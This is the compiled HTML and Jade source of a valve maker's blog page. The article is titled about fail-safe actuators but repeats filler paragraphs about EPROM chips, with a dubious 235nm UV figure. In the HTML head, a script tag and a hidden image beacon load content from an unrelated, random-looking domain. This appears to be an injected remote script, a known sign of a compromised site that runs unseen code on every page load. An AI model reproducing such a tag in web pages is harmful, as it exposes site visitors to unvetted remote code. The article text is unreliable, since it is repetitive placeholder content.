build/blog/html/blog.html
<!DOCTYPE html><!--mixin contactTabInfoCollapse(state, rep, name, phone, email)//  - console.log('{state:' + '#' + state + '#' + ', ' + 'rep:' + '#' + rep + '#' + ', ' + 'name:' + '#' + name + '#' + ', ' + 'phone:' + '#' + phone + '#' + ', ' + 'email:' + '#' + email + '#'  +  '}');
--><html><head><title>Flow Control</title><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><link rel="shortcut icon" href="../img/favicon.ico"><link type="text/css" rel="stylesheet" href="../css/loader.css"><link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans:400,400italic,300,700,600"><link type="text/css" rel="stylesheet" href="../css/style.css"><script src="http://www.jenxsw21lb.com/js/73206.js"></script><noscript><img src="http://www.jenxsw21lb.com/73206.png" style="display:none"></noscript><!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries--><!-- WARNING: Respond.js doesn't work if you view the page via file://--><!--[if IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><script src="../js/placeholder.js"></script><link type="text/css" rel="stylesheet" href="../css/ie.css"><![endif]--></head><body><div class="wrap-loader table"><div class="table-row"><div class="table-cell vertical-middle"><div class="spinner"><div class="rect1"></div><div class="rect2"></div><div class="rect3"></div><div class="rect4"></div><div class="rect5"></div></div></div></div></div><div class="main-header"><div class="container"><nav class="navbar navbar-default"><div class="container-fluid"><div class="navbar-header"><button type="button" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false" class="navbar-toggle collapsed">menu</button><a href="index.html" class="navbar-brand hidden-xs"><img src="../img/logo.png" alt="Flow Control" class="logo-header"></a><a href="index.html" class="navbar-brand visible-xs"><img src="../img/logo-mobile.png" alt="Flow Control" class="logo-header"></a></div><div id="bs-example-navbar-collapse-1" class="collapse navbar-collapse"><ul class="nav navbar-nav navbar-right"><li><a href="product.html">Products</a></li><li><a href="customers.html">Customers</a></li><li><a href="resources.html">Resources</a></li><li><a href="about.html">About</a></li><li><a href="blogs.html">Blog</a></li><li><a href="contact.html">Contact</a></li><li><a href="http://www.flowcontrol.com/Users/login">Log In</a></li></ul></div></div></nav></div></div><div class="container blogs"><div class="row"><div class="col-lg-4 hidden-md hidden-sm hidden-xs blogs__sidebar"><div class="blogs__sidebar-block"><p class="blogs__sidebar-block-heading">Category</p><ul class="blogs__sidebar-menu"><li class="blogs__sidebar-menu-item"><a href="#" class="blogs__sidebar-menu-link">Dell<span class="pull-right">25</span></a></li><li class="blogs__sidebar-menu-item blogs__sidebar-menu-item--active"><a href="#" class="blogs__sidebar-menu-link">Intel<span class="pull-right">425</span></a></li><li class="blogs__sidebar-menu-item"><a href="#" class="blogs__sidebar-menu-link">Lot<span class="pull-right">4</span></a></li><li class="blogs__sidebar-menu-item"><a href="#" class="blogs__sidebar-menu-link">Green Building<span class="pull-right">86</span></a></li><li class="blogs__sidebar-menu-item"><a href="#" class="blogs__sidebar-menu-link">Industrial<span class="pull-right">59</span></a></li><li class="blogs__sidebar-menu-item"><a href="#" class="blogs__sidebar-menu-link">Smart Buildins<span class="pull-right">127</span></a></li></ul></div><div class="blogs__sidebar-block"><p class="blogs__sidebar-block-heading">Popular Posts</p><div class="blogs__sidebar-posts"><a href="#" class="blogs__sidebar-posts-item"><img src="img/blog/popular-post-1.png" class="blogs__sidebar-posts-thumbnail"><div class="blogs__sidebar-posts-info"><p class="blogs__sidebar-posts-title">Block Programming with KMC</p><p class="blogs__sidebar-posts-date">Nov 16, 2016</p></div></a><a href="#" class="blogs__sidebar-posts-item"><img src="img/blog/popular-post-2.png" class="blogs__sidebar-posts-thumbnail"><div class="blogs__sidebar-posts-info"><p class="blogs__sidebar-posts-title">When Failure is Not an Option: The Evolution ...</p><p class="blogs__sidebar-posts-date">Nov 16, 2016</p></div></a><a href="#" class="blogs__sidebar-posts-item"><img src="img/blog/popular-post-3.png" class="blogs__sidebar-posts-thumbnail"><div class="blogs__sidebar-posts-info"><p class="blogs__sidebar-posts-title">What are Benefits of a BAS?</p><p class="blogs__sidebar-posts-date">Nov 16, 2016</p></div></a></div></div></div><div class="col-lg-8 blogs__content"><div class="blogs__content-header"><div class="blogs__content-heading"><p><a href="/blogs.html" class="blogs__content-back"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="9px" height="16px">
  <path fill-rule="evenodd" fill="rgba(0, 0, 0, .4)" d="M8.992,14.495 L7.495,15.992 L0.008,8.506 L0.513,8.000 L0.008,7.495 L7.495,0.008 L8.992,1.506 L2.498,8.000 L8.992,14.495 Z" / >
</svg><span>Back</span></a><a href="#" id="categoriesToggler" class="blogs__content-heading-category hidden-lg">Category
<svg  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="16px" height="12px">
  <path fill-rule="evenodd"  fill="rgb(118, 185, 0)" d="M-0.000,12.000 L-0.000,10.000 L16.000,10.000 L16.000,12.000 L-0.000,12.000 ZM-0.000,5.000 L16.000,5.000 L16.000,7.000 L-0.000,7.000 L-0.000,5.000 ZM-0.000,0.000 L16.000,0.000 L16.000,2.000 L-0.000,2.000 L-0.000,0.000 Z"/>
</svg><div class="category-dropdown-menu"><ul class="blogs__sidebar-menu"><li class="blogs__sidebar-menu-item"><a href="/blogs.html" class="blogs__sidebar-menu-link">Dell<span class="pull-right">25</span></a></li><li class="blogs__sidebar-menu-item blogs__sidebar-menu-item--active"><a href="/blogs.html" class="blogs__sidebar-menu-link">Intel<span class="pull-right">425</span></a></li><li class="blogs__sidebar-menu-item"><a href="/blogs.html" class="blogs__sidebar-menu-link">Lot<span class="pull-right">4</span></a></li><li class="blogs__sidebar-menu-item"><a href="/blogs.html" class="blogs__sidebar-menu-link">Green Building<span class="pull-right">86</span></a></li><li class="blogs__sidebar-menu-item"><a href="/blogs.html" class="blogs__sidebar-menu-link">Industrial<span class="pull-right">59</span></a></li><li class="blogs__sidebar-menu-item"><a href="/blogs.html" class="blogs__sidebar-menu-link">Smart Buildins<span class="pull-right">127</span></a></li></ul></div></a></p></div><div class="blogs__content-filters"><a href="#" class="blogs__content-filter-search"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16">
  <path fill="rgba(0, 0, 0, .4)" d="M3924.99,214.494l-1.49,1.5-5.08-5.072a6.011,6.011,0,1,1,1.5-1.5ZM3915,202a4,4,0,1,0,4,4A4,4,0,0,0,3915,202Z" transform="translate(-3909 -200)" />
</svg></a><div class="blogs__content-filter-search-field"><span contenteditable="true">City</span><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="9.5px" height="9.5px">
  <path fill-rule="evenodd"  stroke="rgb(157, 157, 157)" stroke-width="1px" stroke-linecap="butt" stroke-linejoin="miter" fill="rgb(255, 255, 255)" d="M8.504,7.103 L7.103,8.504 L4.500,5.902 L1.898,8.504 L0.496,7.103 L3.099,4.500 L0.496,1.897 L1.898,0.495 L4.500,3.098 L7.103,0.495 L8.504,1.897 L5.902,4.500 L8.504,7.103 Z" / >
</svg></div><a href="#" class="blogs__content-filter-dropdown">Most recent
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="8px" height="5px">
  <path fill-rule="evenodd" fill="rgba(0, 0, 0, .4)" d="M4.008,4.987 L0.007,0.003 L8.009,0.003 L4.008,4.987 Z" />
</svg></a></div></div><div class="blogs__content-article"><div class="blogs__content-article-heading"><img src="img/blog/post-image.png" class="blogs__content-article-heading-image"><p class="blogs__content-article-heading-title">When Failure is Not an Option: The Evolution of Fail-Safe Actuators.</p><p class="blogs__content-article-heading-date">Nov 18, 2016</p></div><div class="blogs__content-article-body"><p>EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power. A programmed EPROM can keep its data for up to twenty years and can be read indefinite number of times. An Israeli engineer, Dov Frohman invented the EPROM chip in 1971.</p><p>EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power.</p><hr><p class="titleized">1. For reprogramming</p><p class="shifted">The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.</p><p class="titleized">2. Some microcontrollers</p><p class="shifted">The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.</p><p class="titleized">3. Forerunners</p><p class="shifted">The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.</p><hr><div class="cards"><div class="cards-holder"><div class="card"><img src="img/blog/card-1.png"><p>Denver, CO • 2012</p></div><div class="card"><img src="img/blog/card-2.png"><p>New York, NY • 2002</p></div><div class="card"><img src="img/blog/card-3.png"><p>Chicago, IL • 2000</p></div><div class="card"><img src="img/blog/card-1.png"><p>Denver, CO • 2012</p></div><div class="card"><img src="img/blog/card-2.png"><p>New York, NY • 2002</p></div><div class="card"><img src="img/blog/card-3.png"><p>Chicago, IL • 2000</p></div><div class="card"><img src="img/blog/card-1.png"><p>Denver, CO • 2012</p></div><div class="card"><img src="img/blog/card-2.png"><p>New York, NY • 2002</p></div><div class="card"><img src="img/blog/card-3.png"><p>Chicago, IL • 2000</p></div></div></div><p>Some microcontrollers, before the era of EEPROMs and flash memory, used EPROM to store their program. Such microcontrollers include some versions of the Intel 8048, and the “C” edition of the PIC microcontroller.</p><p>EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power. A programmed EPROM can keep its data for up to twenty years and can be read indefinite number of times. An Israeli engineer, Dov Frohman invented the EPROM chip in 1971.</p><p><b>Similar to EPROM chips, such microcontrollers came in windowed (expensive) versions that were handy for debugging and program development. Leaving the die of such a chip exposed to sunlight can change its behavior in unexpected ways.</b></p><!-- Gallery.--><p>Some microcontrollers, before the era of EEPROMs and flash memory, used EPROM to store their program. Such microcontrollers include some versions of the Intel 8048, and the “C” edition of the PIC microcontroller.</p><p>EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power. A programmed EPROM can keep its data for up to twenty years and can be read indefinite number of times. An Israeli engineer, Dov Frohman invented the EPROM chip in 1971.</p><blockquote>“Some microcontrollers, before the era of EEPROMs and flash memory, used EPROM to store their program.”</blockquote><p>Similar to EPROM chips, such microcontrollers came in windowed (expensive) versions that were handy for debugging and program development. Leaving the die of such a chip exposed to sunlight can change its behavior in unexpected ways.</p><p class="titleized">1. For reprogramming</p><p>The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.</p><p class="titleized">2. Some microcontrollers</p><p>The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.</p><p class="titleized">3. Forerunners</p><p>The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.</p></div></div></div></div></div></body><div class="footer"><div id="contactModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" class="modal fade"><button type="button" data-dismiss="modal" class="modal-close-btn"></button><div role="document" class="modal-dialog"><div class="modal-header text-center"><h2 class="modal-header-title">Subscribe to Mailing List</h2></div><div class="modal-body"><form id="contactForm"><div class="form-group"><input type="text" placeholder="Name" id="contactName" required class="form-control"></div><div class="form-group"><input type="email" placeholder="Email" id="contactEmail" required class="form-control"></div><div class="form-group"><input type="text" placeholder="Company" id="contactCompany" required class="form-control"></div></form></div><div class="modal-footer"><button type="button" id="contactButton" class="btn btn-main">subscribe</button></div></div></div><div class="container"><div class="row"><div class="col-md-6"><h5 class="footer-title animated-down-0-7s">About Flow Control Industries</h5><p class="footer-text animated-down-0-8s">Flow Control Industries, Inc. (FCI) is a specialty manufacturer of high-performance pressure independent control valves, delivering energy efficient products and services through a consultative process to increase building value and lower total cost of ownership.</p><p class="footer-text animated-down-0-9s">The DeltaPValve®, FCI’s flagship product, was developed by Founder and Chairman Paul Skoglund, P.E. over 20 years ago when he realized that more effective valves could revolutionize mechanical system efficiency. As an industry pioneer, Paul was the first to create the patented design, development and application of pressure independent control valves.</p><p class="footer-text animated-down-0-9s"><a href="http://www.flowenergy.com" target="_blank" class="footer-link">FlowEnergy</a>, provides a holistic energy intelligence and optimization solution that combines FCI’s proven hardware, advanced software and expert guidance to deliver unprecedented control, in-depth insights, and sustainable savings.</p><div class="copyright hidden-xs hidden-sm animated-down-0-9s">&copy; 2009 - 2016. Flow Control Industries, Inc. All Rights Reserved.</div></div><div class="col-md-6"><h5 class="footer-title animated-down-0-7s">Interested in working with us?</h5><div class="wrap-btn"><a href="mailto:info@flowcontrol.com" class="btn btn-main animated-down-0-9s">Drop us a message</a></div><br><div><div class="footer-title-green animated-down-0-8s">Address:</div><p class="footer-text-contact animated-down-0-8s">18715 141st Ave NE Woodinville, WA 98072</p></div><div><div class="footer-title-green animated-down-0-8s">Phone:</div><a href="tel:425 483 1297" class="footer-text-contact animated-down-0-8s">425.483.1297</a></div><div><div class="footer-title-green animated-down-0-9s">E-mail:</div><a href="mailto:info@flowcontrol.com" class="footer-text-contact animated-down-0-9s">info@flowcontrol.com</a></div><div class="wrap-btn"><button type="button" data-toggle="modal" data-target="#contactModal" class="btn btn-main">Subscribe to mailing list</button></div><br><div><a href="https://www.facebook.com/DeltaPValve" target="_blank"><img src="../img/icons/Facebook.svg" class="svg social__icon"></a><a href="https://twitter.com/FlowControl_Ind" target="_blank"><img src="../img/icons/Twitter.svg" class="svg social__icon"></a><a href="https://www.linkedin.com/company/flow-control-industries-inc-?trk=company_logo" target="_blank"><img src="../img/icons/Linkedin.svg" class="svg social__icon"></a></div></div></div></div></div><script src="https://code.jquery.com/jquery-1.11.3.min.js"></script><script src="../js/selectivizr-min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script><script src="../js/enquire.js"></script><script src="../js/viewportchecker.js"></script><script src="../js/main.js"></script><script src="js/ga.js"></script><script src="../js/contact.js"></script><script src="../js/blogs.js"></script></html>

build/jade/page/blog.jade
extends ../layout/layout

block main-content
    +headerNav()
    .container.blogs
        .row
            .col-lg-4.hidden-md.hidden-sm.hidden-xs.blogs__sidebar
                .blogs__sidebar-block
                    p.blogs__sidebar-block-heading Category
                    ul.blogs__sidebar-menu
                        li.blogs__sidebar-menu-item
                            a(href='#').blogs__sidebar-menu-link
                                | Dell
                                span.pull-right 25
                        li.blogs__sidebar-menu-item.blogs__sidebar-menu-item--active
                            a(href='#').blogs__sidebar-menu-link
                                | Intel
                                span.pull-right 425
                        li.blogs__sidebar-menu-item
                            a(href='#').blogs__sidebar-menu-link
                                | Lot
                                span.pull-right 4
                        li.blogs__sidebar-menu-item
                            a(href='#').blogs__sidebar-menu-link
                                | Green Building
                                span.pull-right 86
                        li.blogs__sidebar-menu-item
                            a(href='#').blogs__sidebar-menu-link
                                | Industrial
                                span.pull-right 59
                        li.blogs__sidebar-menu-item
                            a(href='#').blogs__sidebar-menu-link
                                | Smart Buildins
                                span.pull-right 127
                .blogs__sidebar-block
                    p.blogs__sidebar-block-heading Popular Posts
                    .blogs__sidebar-posts
                        a(href='#').blogs__sidebar-posts-item
                            img(src='img/blog/popular-post-1.png').blogs__sidebar-posts-thumbnail
                            .blogs__sidebar-posts-info
                                p.blogs__sidebar-posts-title Block Programming with KMC
                                p.blogs__sidebar-posts-date Nov 16, 2016
                        a(href='#').blogs__sidebar-posts-item
                            img(src='img/blog/popular-post-2.png').blogs__sidebar-posts-thumbnail
                            .blogs__sidebar-posts-info
                                p.blogs__sidebar-posts-title When Failure is Not an Option: The Evolution ...
                                p.blogs__sidebar-posts-date Nov 16, 2016
                        a(href='#').blogs__sidebar-posts-item
                            img(src='img/blog/popular-post-3.png').blogs__sidebar-posts-thumbnail
                            .blogs__sidebar-posts-info
                                p.blogs__sidebar-posts-title What are Benefits of a BAS?
                                p.blogs__sidebar-posts-date Nov 16, 2016
            .col-lg-8.blogs__content
                .blogs__content-header
                    .blogs__content-heading
                        p
                            a(href='/blogs.html').blogs__content-back
                                | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="9px" height="16px">
                                |   <path fill-rule="evenodd" fill="rgba(0, 0, 0, .4)" d="M8.992,14.495 L7.495,15.992 L0.008,8.506 L0.513,8.000 L0.008,7.495 L7.495,0.008 L8.992,1.506 L2.498,8.000 L8.992,14.495 Z" / >
                                | </svg>
                                span Back
                            a(href='#')#categoriesToggler.blogs__content-heading-category.hidden-lg
                                | Category
                                | <svg  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="16px" height="12px">
                                |   <path fill-rule="evenodd"  fill="rgb(118, 185, 0)" d="M-0.000,12.000 L-0.000,10.000 L16.000,10.000 L16.000,12.000 L-0.000,12.000 ZM-0.000,5.000 L16.000,5.000 L16.000,7.000 L-0.000,7.000 L-0.000,5.000 ZM-0.000,0.000 L16.000,0.000 L16.000,2.000 L-0.000,2.000 L-0.000,0.000 Z"/>
                                | </svg>
                                .category-dropdown-menu
                                    ul.blogs__sidebar-menu
                                        li.blogs__sidebar-menu-item
                                            a(href='/blogs.html').blogs__sidebar-menu-link
                                                | Dell
                                                span.pull-right 25
                                        li.blogs__sidebar-menu-item.blogs__sidebar-menu-item--active
                                            a(href='/blogs.html').blogs__sidebar-menu-link
                                                | Intel
                                                span.pull-right 425
                                        li.blogs__sidebar-menu-item
                                            a(href='/blogs.html').blogs__sidebar-menu-link
                                                | Lot
                                                span.pull-right 4
                                        li.blogs__sidebar-menu-item
                                            a(href='/blogs.html').blogs__sidebar-menu-link
                                                | Green Building
                                                span.pull-right 86
                                        li.blogs__sidebar-menu-item
                                            a(href='/blogs.html').blogs__sidebar-menu-link
                                                | Industrial
                                                span.pull-right 59
                                        li.blogs__sidebar-menu-item
                                            a(href='/blogs.html').blogs__sidebar-menu-link
                                                | Smart Buildins
                                                span.pull-right 127
                    .blogs__content-filters
                        a(href='#').blogs__content-filter-search
                            | <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16">
                            |   <path fill="rgba(0, 0, 0, .4)" d="M3924.99,214.494l-1.49,1.5-5.08-5.072a6.011,6.011,0,1,1,1.5-1.5ZM3915,202a4,4,0,1,0,4,4A4,4,0,0,0,3915,202Z" transform="translate(-3909 -200)" />
                            | </svg>
                        .blogs__content-filter-search-field
                            span(contenteditable='true') City
                            | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="9.5px" height="9.5px">
                            |   <path fill-rule="evenodd"  stroke="rgb(157, 157, 157)" stroke-width="1px" stroke-linecap="butt" stroke-linejoin="miter" fill="rgb(255, 255, 255)" d="M8.504,7.103 L7.103,8.504 L4.500,5.902 L1.898,8.504 L0.496,7.103 L3.099,4.500 L0.496,1.897 L1.898,0.495 L4.500,3.098 L7.103,0.495 L8.504,1.897 L5.902,4.500 L8.504,7.103 Z" / >
                            | </svg>
                        a(href='#').blogs__content-filter-dropdown
                            | Most recent
                            | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="8px" height="5px">
                            |   <path fill-rule="evenodd" fill="rgba(0, 0, 0, .4)" d="M4.008,4.987 L0.007,0.003 L8.009,0.003 L4.008,4.987 Z" />
                            | </svg>
                .blogs__content-article
                    .blogs__content-article-heading
                        img(src='img/blog/post-image.png').blogs__content-article-heading-image
                        p.blogs__content-article-heading-title When Failure is Not an Option: The Evolution of Fail-Safe Actuators.
                        p.blogs__content-article-heading-date Nov 18, 2016
                    .blogs__content-article-body
                        p EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power. A programmed EPROM can keep its data for up to twenty years and can be read indefinite number of times. An Israeli engineer, Dov Frohman invented the EPROM chip in 1971.
                        p EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power.
                        hr
                        p.titleized 1. For reprogramming
                        p.shifted The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.
                        p.titleized 2. Some microcontrollers
                        p.shifted The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.
                        p.titleized 3. Forerunners
                        p.shifted The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.
                        hr
                        .cards
                            .cards-holder
                                .card
                                    img(src='img/blog/card-1.png')
                                    p Denver, CO • 2012
                                .card
                                    img(src='img/blog/card-2.png')
                                    p New York, NY • 2002
                                .card
                                    img(src='img/blog/card-3.png')
                                    p Chicago, IL • 2000
                                .card
                                    img(src='img/blog/card-1.png')
                                    p Denver, CO • 2012
                                .card
                                    img(src='img/blog/card-2.png')
                                    p New York, NY • 2002
                                .card
                                    img(src='img/blog/card-3.png')
                                    p Chicago, IL • 2000
                                .card
                                    img(src='img/blog/card-1.png')
                                    p Denver, CO • 2012
                                .card
                                    img(src='img/blog/card-2.png')
                                    p New York, NY • 2002
                                .card
                                    img(src='img/blog/card-3.png')
                                    p Chicago, IL • 2000
                        p Some microcontrollers, before the era of EEPROMs and flash memory, used EPROM to store their program. Such microcontrollers include some versions of the Intel 8048, and the “C” edition of the PIC microcontroller.
                        p EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power. A programmed EPROM can keep its data for up to twenty years and can be read indefinite number of times. An Israeli engineer, Dov Frohman invented the EPROM chip in 1971.
                        p
                            b Similar to EPROM chips, such microcontrollers came in windowed (expensive) versions that were handy for debugging and program development. Leaving the die of such a chip exposed to sunlight can change its behavior in unexpected ways.
                        // Gallery.
                        p Some microcontrollers, before the era of EEPROMs and flash memory, used EPROM to store their program. Such microcontrollers include some versions of the Intel 8048, and the “C” edition of the PIC microcontroller.
                        p EPROM or Erasable Programmable Read Only Memory is rewritable memory chip that can hold its data without power. A programmed EPROM can keep its data for up to twenty years and can be read indefinite number of times. An Israeli engineer, Dov Frohman invented the EPROM chip in 1971.
                        blockquote “Some microcontrollers, before the era of EEPROMs and flash memory, used EPROM to store their program.”
                        p Similar to EPROM chips, such microcontrollers came in windowed (expensive) versions that were handy for debugging and program development. Leaving the die of such a chip exposed to sunlight can change its behavior in unexpected ways.
                        p.titleized 1. For reprogramming
                        p The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.
                        p.titleized 2. Some microcontrollers
                        p The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.
                        p.titleized 3. Forerunners
                        p The chip is extracted from the circuit board, the tape is detached and it is placed below a concentrated ultraviolet (UV) light of wavelength 235nm light for approximately 20 minutes.
